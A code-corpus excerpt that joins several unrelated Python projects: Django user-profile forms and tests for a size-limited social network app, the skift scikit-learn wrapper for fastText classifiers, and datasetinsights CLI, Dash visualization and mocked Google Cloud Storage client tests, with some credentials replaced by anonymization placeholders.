self.fields['email'].help_text = ''
self.fields['email'].label = ''
self.fields['password'].widget.attrs.update({
'placeholder': 'Password', 'class': 'form-control mb-3'
})
self.fields['password'].help_text = ''
self.fields['password'].label = ''
self.fields['password_again'].widget.attrs.update({
'placeholder': 'Repeat password', 'class': 'form-control mb-3'
})
self.fields['password_again'].help_text = ''
self.fields['password_again'].label = ''
# this code is for descendants
# remove unnecessary fields
unnecessary = set(self.fields.keys()) - set(self.Meta.fields)
for field in unnecessary:
self.fields.pop(field)
def clean(self):
cleaned_data = super().clean()
validation_errors = list()
# Calculate form size
# use latest id as reference
try:
form_size = len(str(User.objects.latest('id').id))
except ObjectDoesNotExist:
form_size = 1
# if we already had errors, than we will skip this fields
for field_name in set(self.changed_data) - set(self.errors):
if field_name in ['password_again']:
continue
if field_name == 'avatar':
form_size += cleaned_data['avatar'].size
continue
form_size += len(str(cleaned_data[field_name]))
if form_size > MAX_PAGE_SIZE:
validation_errors.append(forms.ValidationError(_('You have only 640Kb for all purposes!'), code='oversize'))
# Clean password
cleaned_data, password_clean_errors = self._clean_password(cleaned_data)
validation_errors += password_clean_errors
if validation_errors:
raise forms.ValidationError(validation_errors)
new_pass = cleaned_data['password']
if len(new_pass) > 0:
cleaned_data['password'] = <PASSWORD>(<PASSWORD>)
return cleaned_data
class UserUpdateForm(UserForm):
firstname = forms.CharField(widget=forms.TextInput)
lastname = forms.CharField(widget=forms.TextInput)
patronymic = forms.CharField(widget=forms.TextInput)
birth_date = forms.DateField(widget=forms.DateInput, input_formats=[DATE_FORMAT])
class Meta(UserForm.Meta):
fields = ('firstname', 'lastname', 'patronymic', 'birth_date', 'password', 'password_again', 'avatar')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for key in self.fields:
self.fields[key].required = False
self.fields['firstname'].widget.attrs.update({
'placeholder': 'First Name', 'class': 'form-control mb-3'
})
self.fields['firstname'].help_text = ''
self.fields['firstname'].label = ''
self.fields['lastname'].widget.attrs.update({
'placeholder': 'Last Name', 'class': 'form-control mb-3'
})
self.fields['lastname'].help_text = ''
self.fields['lastname'].label = ''
self.fields['patronymic'].widget.attrs.update({
'placeholder': 'Patronymic', 'class': 'form-control mb-3'
})
self.fields['patronymic'].help_text = ''
self.fields['patronymic'].label = ''
self.fields['birth_date'].widget.attrs.update({
'placeholder': 'Birth Date', 'class': 'form-control mb-3'
})
self.fields['birth_date'].widget.format = DATE_FORMAT
self.fields['birth_date'].help_text = ''
self.fields['birth_date'].label = ''
self.fields['password'].widget.attrs.update({
'placeholder': 'New password'})
self.fields['password_again'].widget.attrs.update({
'placeholder': 'Repeat new password'})
def clean(self):
cleaned_data = super().clean()
delta = 0
# if we have empty password field then skip updating this field
if 'password' in self.changed_data:
password = cleaned_data['password']
if len(password) == 0:
index = self.changed_data.index('password')
self.changed_data.pop(index)
cleaned_data.pop('password')
# get approximate size of user fields
original_sizes = self.instance.get_fields_size()
# check delta for all fields except password_again (not exist in DB)
for field_name in self.changed_data:
if field_name in ['password_again']:
continue
updated_value = cleaned_data[field_name]
if not updated_value:
updated_len = 0
elif field_name == 'avatar':
updated_len = updated_value.size
else:
updated_len = len(str(updated_value))
original_len = original_sizes[field_name]
delta += updated_len - original_len
if self.instance.get_size() + delta > MAX_PAGE_SIZE:
raise forms.ValidationError(_(ERR_EXCEED_LIMIT), code='oversize')
return cleaned_data
class UserRequestPasswordResetForm(PasswordResetForm):
email = forms.EmailField(widget=forms.EmailInput, max_length=256)
class Meta:
model = User
fields = ('email',)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['email'].widget.attrs.update({
'placeholder': 'Email', 'class': 'form-control mb-3'
})
self.fields['email'].help_text = ''
self.fields['email'].label = ''
class UserPasswordUpdateForm(UserForm):
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
class Meta(UserForm.Meta):
fields = ('password', 'password_again')
class UserPasswordResetConfirmForm(CleanPasswordMixin, forms.Form):
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super().__init__(*args, **kwargs)
def clean(self):
cleaned_data = super().clean()
cleaned_data, password_clean_errors = self._clean_password(cleaned_data)
if password_clean_errors:
raise forms.ValidationError(password_clean_errors)
return cleaned_data
def save(self, commit=True):
password = self.cleaned_data["password"]
self.user.set_password(password)
if commit:
self.user.save()
return self.user
```
#### File: user_profile/tests/test_models.py
```python
from uuid import uuid1
from django.core.cache import cache
from django.test import TestCase
from Net640.apps.user_profile.models import User
from Net640.apps.user_profile.models import RELATIONSHIP_FRIENDS, RELATIONSHIP_REQUEST_HAS_SENT
from Net640.apps.user_profile.models import RELATIONSHIP_WAITING_FOR_ACCEPT, NO_RELATIONSHIP
class TestUserPermission(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user1 = User(username=random_name, email=random_name + '@m.ru')
self.user1.set_password('<PASSWORD>')
self.user1.save()
random_name = str(uuid1())
self.user2 = User(username=random_name, email=random_name + '@m.ru')
self.user2.set_password('<PASSWORD>')
self.user2.save()
def test_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
def test_cancel_own_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
self.user1.cancel(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_cancel_foreign_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
self.user2.cancel(self.user1)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_add_to_friends(self):
self.user1.accept(self.user2)
self.user2.accept(self.user1)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user1.get_friends()[0].username, self.user2.username)
self.assertEqual(self.user2.get_friends()[0].username, self.user1.username)
def test_remove_from_friends(self):
self.user1.accept(self.user2)
self.user2.accept(self.user1)
self.user1.cancel(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
class TestCaching(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user1 = User(username=random_name, email=random_name + '@<EMAIL>')
self.user1.set_password('<PASSWORD>')
self.user1.save()
def test_get_size_caching_is_working(self):
fake_size = 777
cache.delete(self.user1.id)
size = self.user1.get_size()
cache.set(self.user1.id, fake_size)
self.assertNotEqual(size, fake_size)
self.assertEqual(fake_size, self.user1.get_size())
```
#### File: Net640/testing/runners.py
```python
from django.test.runner import DiscoverRunner
from django.test import TransactionTestCase, TestCase
from unittest.suite import TestSuite
class TransactionTestRunner(DiscoverRunner):
"""
to run tests with this runner execute following command
python manage.py test --testrunner "Net640.testing.runners.TransactionTestRunner"
"""
def build_suite(self, *args, **kwargs):
suite = super().build_suite(*args, **kwargs)
tests = [t for t in suite._tests if self.is_transactiontest(t)]
return TestSuite(tests=tests)
def is_transactiontest(self, test):
return hasattr(test, "TRANSACTION_TEST_CASE")
class UnitTestRunner(DiscoverRunner):
"""
to run tests with this runner execute following command
python manage.py test --testrunner "Net640.testing.runners.UnitTestRunner"
"""
def build_suite(self, *args, **kwargs):
suite = super().build_suite(*args, **kwargs)
tests = [t for t in suite._tests if self.is_unittest(t)]
return TestSuite(tests=tests)
def is_unittest(self, test):
return not hasattr(test, "TRANSACTION_TEST_CASE")
``` |
{
"source": "86mm86/skift",
"score": 3
} |
#### File: skift/skift/core.py
```python
import os
import abc
import numpy as np
from fastText import train_supervised
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.utils.multiclass import unique_labels
from sklearn.exceptions import NotFittedError
from .util import (
temp_dataset_fpath,
dump_xy_to_fasttext_format,
python_fasttext_model_to_bytes,
bytes_to_python_fasttext_model,
)
class FtClassifierABC(BaseEstimator, ClassifierMixin, metaclass=abc.ABCMeta):
"""An abstact base class for sklearn classifier adapters for fasttext.
Parameters
----------
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
self.kwargs.pop('input', None) # remove the 'input' arg, if given
self.model = None
def __getstate__(self):
if self.model is not None:
model_pickle = python_fasttext_model_to_bytes(self.model)
pickle_dict = self.__dict__.copy()
pickle_dict['model'] = model_pickle
return pickle_dict
return self.__dict__
def __setstate__(self, dicti):
for key in dicti:
if key == 'model':
unpic_model = bytes_to_python_fasttext_model(dicti[key])
setattr(self, 'model', unpic_model)
else:
setattr(self, key, dicti[key])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return self.kwargs
ALLOWED_DTYPES_ = ['<U26', object]
@staticmethod
def _validate_x(X):
try:
if len(X.shape) != 2:
raise ValueError(
"FastTextClassifier methods must get a two-dimensional "
"numpy array (or castable) as the X parameter.")
return X
except AttributeError:
return FtClassifierABC._validate_x(np.array(X))
@staticmethod
def _validate_y(y):
try:
if len(y.shape) != 1:
raise ValueError(
"FastTextClassifier methods must get a one-dimensional "
"numpy array as the y parameter.")
return np.array(y)
except AttributeError:
return FtClassifierABC._validate_y(np.array(y))
@abc.abstractmethod
def _input_col(self, X):
pass # pragma: no cover
def fit(self, X, y):
"""Fits the classifier
Parameters
----------
X : array-like, shape = [n_samples, n_features]
The training input samples.
y : array-like, shape = [n_samples]
The target values. An array of int.
Returns
-------
self : object
Returns self.
"""
# Check that X and y have correct shape
self._validate_x(X)
y = self._validate_y(y)
# Store the classes seen during fit
self.classes_ = unique_labels(y)
self.num_classes_ = len(self.classes_)
self.class_labels_ = [
'__label__{}'.format(lbl) for lbl in self.classes_]
# Dump training set to a fasttext-compatible file
temp_trainset_fpath = temp_dataset_fpath()
input_col = self._input_col(X)
dump_xy_to_fasttext_format(input_col, y, temp_trainset_fpath)
# train
self.model = train_supervised(
input=temp_trainset_fpath, **self.kwargs)
# Return the classifier
try:
os.remove(temp_trainset_fpath)
except FileNotFoundError: # pragma: no cover
pass
return self
@staticmethod
def _clean_label(ft_label):
return int(ft_label[9:])
def _predict(self, X, k=1):
# Ensure that fit had been called
if self.model is None:
raise NotFittedError("This {} instance is not fitted yet.".format(
self.__class__.__name__))
# Input validation{
self._validate_x(X)
input_col = self._input_col(X)
return [self.model.predict(text, k) for text in input_col]
def predict(self, X):
"""Predict labels.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : array of int of shape = [n_samples]
Predicted labels for the given inpurt samples.
"""
return np.array([
self._clean_label(res[0][0])
for res in self._predict(X)
], dtype=np.float_)
def _format_probas(self, result):
lbl_prob_pairs = zip(result[0], result[1])
sorted_lbl_prob_pairs = sorted(
lbl_prob_pairs, key=lambda x: self.class_labels_.index(x[0]))
return [x[1] for x in sorted_lbl_prob_pairs]
def predict_proba(self, X):
"""Predict class probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
p : array of shape = [n_samples, n_classes]
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute classes_.
"""
return np.array([
self._format_probas(res)
for res in self._predict(X, self.num_classes_)
], dtype=np.float_)
class FirstColFtClassifier(FtClassifierABC):
"""An sklearn classifier adapter for fasttext using the first column.
Parameters
----------
**kwargs
Additional keyword arguments will be redirected to
fasttext.train_supervised.
"""
def _input_col(self, X):
return np.array(X)[:, 0]
class IdxBasedFtClassifier(FtClassifierABC):
"""An sklearn classifier adapter for fasttext that takes input by index.
Parameters
----------
input_ix : int
The index of the text input column for fasttext.
**kwargs
Additional keyword arguments will be redirected to
fasttext.train_supervised.
"""
def __init__(self, input_ix, **kwargs):
super().__init__(**kwargs)
self.input_ix = input_ix
def _input_col(self, X):
return np.array(X)[:, self.input_ix]
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return {'input_ix': self.input_ix, **self.kwargs}
class FirstObjFtClassifier(FtClassifierABC):
"""An sklearn adapter for fasttext using the first object column as input.
This classifier assume the X parameter for fit, predict and predict_proba
is in all cases a pandas.DataFrame object.
Parameters
----------
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def _input_col(self, X):
input_col_name = None
for col_name, dtype in X.dtypes.items():
if dtype == object:
input_col_name = col_name
break
if input_col_name is not None:
return X[input_col_name]
raise ValueError("No object dtype column in input param X.")
class ColLblBasedFtClassifier(FtClassifierABC):
"""An sklearn adapter for fasttext taking input by column label.
This classifier assume the X parameter for fit, predict and predict_proba
is in all cases a pandas.DataFrame object.
Parameters
----------
input_col_lbl : str
The label of the text input column for fasttext.
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def __init__(self, input_col_lbl, **kwargs):
super().__init__(**kwargs)
self.input_col_lbl = input_col_lbl
def _input_col(self, X):
return X[self.input_col_lbl]
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return {'input_col_lbl': self.input_col_lbl, **self.kwargs}
``` |
{
"source": "86sanj/datasetinsights",
"score": 2
} |
#### File: datasetinsights/datasetinsights/__main__.py
```python
import logging
import click
from datasetinsights.commands import Entrypoint
from datasetinsights.constants import CONTEXT_SETTINGS
logging.basicConfig(
level=logging.INFO,
format=(
"%(levelname)s | %(asctime)s | %(name)s | %(threadName)s | "
"%(message)s"
),
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
@click.command(
cls=Entrypoint, help="Dataset Insights.", context_settings=CONTEXT_SETTINGS,
)
@click.option(
"-v",
"--verbose",
is_flag=True,
default=False,
help="Enables verbose mode.",
)
def entrypoint(verbose):
if verbose:
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
if __name__ == "__main__":
entrypoint()
```
#### File: stats/visualization/app.py
```python
import os
import dash
def _init_app():
""" Intializes the dash app."""
this_dir = os.path.dirname(os.path.abspath(__file__))
css_file = os.path.join(this_dir, "stylesheet.css")
app = dash.Dash(
__name__,
external_stylesheets=[css_file],
suppress_callback_exceptions=True,
)
return app
_app = _init_app()
def get_app():
return _app
```
#### File: stats/visualization/overview.py
```python
import json
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import datasetinsights.stats.statistics as stat
import datasetinsights.stats.visualization.constants as constants
from .app import get_app
from .plots import bar_plot, histogram_plot
app = get_app()
def generate_total_counts_figure(max_samples, roinfo):
""" Method for generating total object count bar plot using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display total object count
"""
total_counts_fig = bar_plot(
roinfo.total_counts(),
x="label_id",
y="count",
x_title="Label Id",
y_title="Count",
title="Total Object Count in Dataset",
hover_name="label_name",
)
return total_counts_fig
def generate_per_capture_count_figure(max_samples, roinfo):
""" Method for generating object count per capture histogram using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display object counts per capture
"""
per_capture_count_fig = histogram_plot(
roinfo.per_capture_counts(),
x="count",
x_title="Object Counts Per Capture",
y_title="Frequency",
title="Distribution of Object Counts Per Capture: Overall",
max_samples=max_samples,
)
return per_capture_count_fig
def generate_pixels_visible_per_object_figure(max_samples, roinfo):
""" Method for generating pixels visible per object histogram using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display visible pixels per object
"""
pixels_visible_per_object_fig = histogram_plot(
roinfo.raw_table,
x="visible_pixels",
x_title="Visible Pixels Per Object",
y_title="Frequency",
title="Distribution of Visible Pixels Per Object: Overall",
max_samples=max_samples,
)
return pixels_visible_per_object_fig
def html_overview(data_root):
""" Method for displaying overview statistics.
Args:
data_root(str): path to the dataset.
Returns:
html layout: displays graphs for overview statistics.
"""
roinfo = stat.RenderedObjectInfo(
data_root=data_root, def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID
)
label_names = roinfo.total_counts()["label_name"].unique()
total_counts_fig = generate_total_counts_figure(
constants.MAX_SAMPLES, roinfo
)
per_capture_count_fig = generate_per_capture_count_figure(
constants.MAX_SAMPLES, roinfo
)
pixels_visible_per_object_fig = generate_pixels_visible_per_object_figure(
constants.MAX_SAMPLES, roinfo
)
overview_layout = html.Div(
[
html.Div(id="overview"),
dcc.Markdown(
""" # Total Object Count """, style={"text-align": "center"}
),
dcc.Graph(id="total_count", figure=total_counts_fig,),
html.Div(
[
dcc.Markdown(
""" # Object Count Distribution """,
style={"text-align": "center"},
),
dcc.Dropdown(
id="object_count_filter",
options=[{"label": i, "value": i} for i in label_names],
value=label_names[0],
),
],
),
html.Div(
[
dcc.Graph(
id="per_object_count", figure=per_capture_count_fig,
),
dcc.Graph(id="per_object_count_filter_graph",),
],
style={"columnCount": 2},
),
html.Div(
[
dcc.Markdown(
"""# Visible Pixels Distribution """,
style={"text-align": "center"},
),
dcc.Dropdown(
id="pixels_visible_filter",
options=[{"label": i, "value": i} for i in label_names],
value=label_names[0],
),
],
),
html.Div(
[
dcc.Graph(
id="pixels_visible_per_object",
figure=pixels_visible_per_object_fig,
),
dcc.Graph(id="pixels_visible_filter_graph",),
],
style={"columnCount": 2},
),
],
)
return overview_layout
@app.callback(
Output("pixels_visible_filter_graph", "figure"),
[
Input("pixels_visible_filter", "value"),
Input("data_root_value", "children"),
],
)
def update_visible_pixels_figure(label_value, json_data_root):
""" Method for generating pixels visible histogram for selected object.
Args:
label_value (str): value selected by user using drop-down
Returns:
plotly.graph_objects.Figure: displays visible pixels distribution.
"""
roinfo = stat.RenderedObjectInfo(
data_root=json.loads(json_data_root),
def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID,
)
filtered_roinfo = roinfo.raw_table[
roinfo.raw_table["label_name"] == label_value
][["visible_pixels"]]
filtered_figure = histogram_plot(
filtered_roinfo,
x="visible_pixels",
x_title="Visible Pixels For " + str(label_value),
y_title="Frequency",
title="Distribution of Visible Pixels For " + str(label_value),
max_samples=constants.MAX_SAMPLES,
)
return filtered_figure
@app.callback(
Output("per_object_count_filter_graph", "figure"),
[
Input("object_count_filter", "value"),
Input("data_root_value", "children"),
],
)
def update_object_counts_capture_figure(label_value, json_data_root):
""" Method for generating object count per capture histogram for selected
object.
Args:
label_value (str): value selected by user using drop-down
Returns:
plotly.graph_objects.Figure: displays object count distribution.
"""
roinfo = stat.RenderedObjectInfo(
data_root=json.loads(json_data_root),
def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID,
)
filtered_object_count = roinfo.raw_table[
roinfo.raw_table["label_name"] == label_value
]
filtered_object_count = (
filtered_object_count.groupby(["capture_id"])
.size()
.to_frame(name="count")
.reset_index()
)
filtered_figure = histogram_plot(
filtered_object_count,
x="count",
x_title="Object Counts Per Capture For " + str(label_value),
y_title="Frequency",
title="Distribution of Object Counts Per Capture For "
+ str(label_value),
max_samples=constants.MAX_SAMPLES,
)
return filtered_figure
```
#### File: datasetinsights/tests/test_dashboard.py
```python
import pandas as pd
from datasetinsights.stats.visualization.object_detection import ScaleFactor
def test_generate_scale_data():
captures = [
{
"id": "4521949a- 2a71-4c03-beb0-4f6362676639",
"sensor": {"scale": 1.0},
},
{
"id": "4b35a47a-3f63-4af3-b0e8-e68cb384ad75",
"sensor": {"scale": 2.0},
},
]
captures = pd.DataFrame(captures)
actual_scale = ScaleFactor.generate_scale_data(captures)
expected_scale = pd.DataFrame([1.0, 2.0], columns=["scale"])
pd.testing.assert_frame_equal(expected_scale, actual_scale)
```
#### File: datasetinsights/tests/test_gcs.py
```python
from pathlib import Path
from unittest.mock import MagicMock, patch
import pytest
from datasetinsights.io.downloader import GCSDatasetDownloader
from datasetinsights.io.exceptions import ChecksumError
from datasetinsights.io.gcs import GCSClient
bucket_name = "fake_bucket"
local_path = "path/to/local"
md5_hash = "abc=="
md5_hash_hex = "12345"
file_name = "/data.zip"
base_key = "path/to/object"
base_url = "gs://fake_bucket/path/to/object"
@patch("datasetinsights.io.gcs.GCSClient._upload_file")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_file_bucket_key(mock_isdir, mock_upload_file):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_isdir.return_value = False
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=localfile, bucket=bucket_name, key=base_key)
mock_upload_file.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=localfile,
)
@patch("datasetinsights.io.gcs.GCSClient._upload_file")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_file_url(mock_isdir, mock_upload_file):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_isdir.return_value = False
url = base_url + file_name
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=localfile, url=url)
mock_upload_file.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key + file_name,
local_path=localfile,
)
@patch("datasetinsights.io.gcs.GCSClient._upload_folder")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_folder_bucket_key(mock_isdir, mock_upload_folder):
mocked_gcs_client = MagicMock()
mock_isdir.return_value = True
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(
local_path=local_path, bucket=bucket_name, key=base_key, pattern="*"
)
mock_upload_folder.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=local_path,
pattern="*",
)
@patch("datasetinsights.io.gcs.GCSClient._upload_folder")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_folder_url(mock_isdir, mock_upload_folder):
mocked_gcs_client = MagicMock()
mock_isdir.return_value = True
url = base_url
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=local_path, url=url, pattern="*")
mock_upload_folder.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=local_path,
pattern="*",
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_file")
def test_gcs_client_download_file_bucket_key(mock_download_file, mock_is_file):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = True
object_key = base_key + file_name
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(
local_path=local_path, bucket=bucket_name, key=object_key
)
mock_download_file.assert_called_with(
mocked_gcs_client.get_bucket(), object_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_file")
def test_gcs_client_download_file_url(mock_download_file, mock_is_file):
url = base_url + file_name
mocked_gcs_client = MagicMock()
mock_is_file.return_value = True
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(local_path=local_path, url=url)
mock_download_file.assert_called_with(
mocked_gcs_client.get_bucket(), base_key + file_name, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_folder")
def test_gcs_client_download_folder_bucket_key(
mock_download_folder, mock_is_file
):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = False
object_key = base_key
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(
local_path=local_path, bucket=bucket_name, key=object_key
)
mock_download_folder.assert_called_with(
mocked_gcs_client.get_bucket(), object_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_folder")
def test_gcs_client_download_folder_url(mock_download_folder, mock_is_file):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = False
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(local_path=local_path, url=base_url)
mock_download_folder.assert_called_with(
mocked_gcs_client.get_bucket(), base_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._download_validate")
def test_download_folder(mock_download_validate):
object_key = "path/to" + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_blob = MagicMock()
mocked_bucket = MagicMock()
mocked_bucket.list_blobs = MagicMock(return_value=[mocked_blob])
mocked_blob.name = object_key
client._download_folder(mocked_bucket, object_key, local_path)
mock_download_validate.assert_called_with(mocked_blob, local_path)
@patch("datasetinsights.io.gcs.GCSClient._download_validate")
def test_download_file(mock_download_validate):
object_key = base_key + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.name = object_key
client._download_file(mocked_bucket, object_key, local_path)
mocked_bucket.get_blob.assert_called_with(object_key)
mock_download_validate.assert_called_with(
mocked_blob, local_path + file_name
)
@patch("datasetinsights.io.gcs.GCSClient._download_blob")
@patch("datasetinsights.io.gcs.GCSClient._checksum")
def test_download_validate(mock_checksum, mock_download_blob):
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_blob = MagicMock()
client._download_validate(mocked_blob, local_path)
mock_checksum.assert_called_with(mocked_blob, local_path)
mock_download_blob.assert_called_with(mocked_blob, local_path)
@patch("datasetinsights.io.gcs.isdir")
def test_download_blob(mock_isdir):
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
mock_isdir.return_value = True
object_key = base_key + file_name
client = GCSClient()
mocked_blob = MagicMock()
mocked_blob.name = object_key
mocked_download_blob = MagicMock()
mocked_blob.download_to_filename = mocked_download_blob
client._download_blob(mocked_blob, local_path)
mocked_blob.download_to_filename.assert_called_with(local_path)
@patch("datasetinsights.io.gcs.GCSClient._md5_hex")
@patch("datasetinsights.io.gcs.validate_checksum")
def test_checksum(mock_checksum, mock_md5_hex):
local_file_path = local_path + file_name
mocked_gcs_client = MagicMock()
mock_md5_hex.return_value = md5_hash_hex
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.md5_hash = md5_hash
client._checksum(mocked_blob, local_file_path)
mock_checksum.assert_called_with(
local_file_path, md5_hash_hex, algorithm="MD5"
)
@patch("datasetinsights.io.gcs.os.remove")
@patch("datasetinsights.io.gcs.validate_checksum")
def test_checksum_error(mock_checksum, mock_remove):
local_file_path = local_path + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.md5_hash = md5_hash
client._MD5_hex = MagicMock(return_value=md5_hash_hex)
client._checksum(mocked_blob, local_file_path)
mock_checksum.side_effect = ChecksumError
with pytest.raises(ChecksumError):
client._checksum(mocked_blob, local_file_path)
mock_remove.assert_called_once()
def test_is_file():
object_key = base_key + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.name = object_key
actual_result = client._is_file(mocked_bucket, object_key)
mocked_bucket.get_blob.assert_called_with(object_key)
expected_result = True
assert actual_result == expected_result
def test_MD5_hex():
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
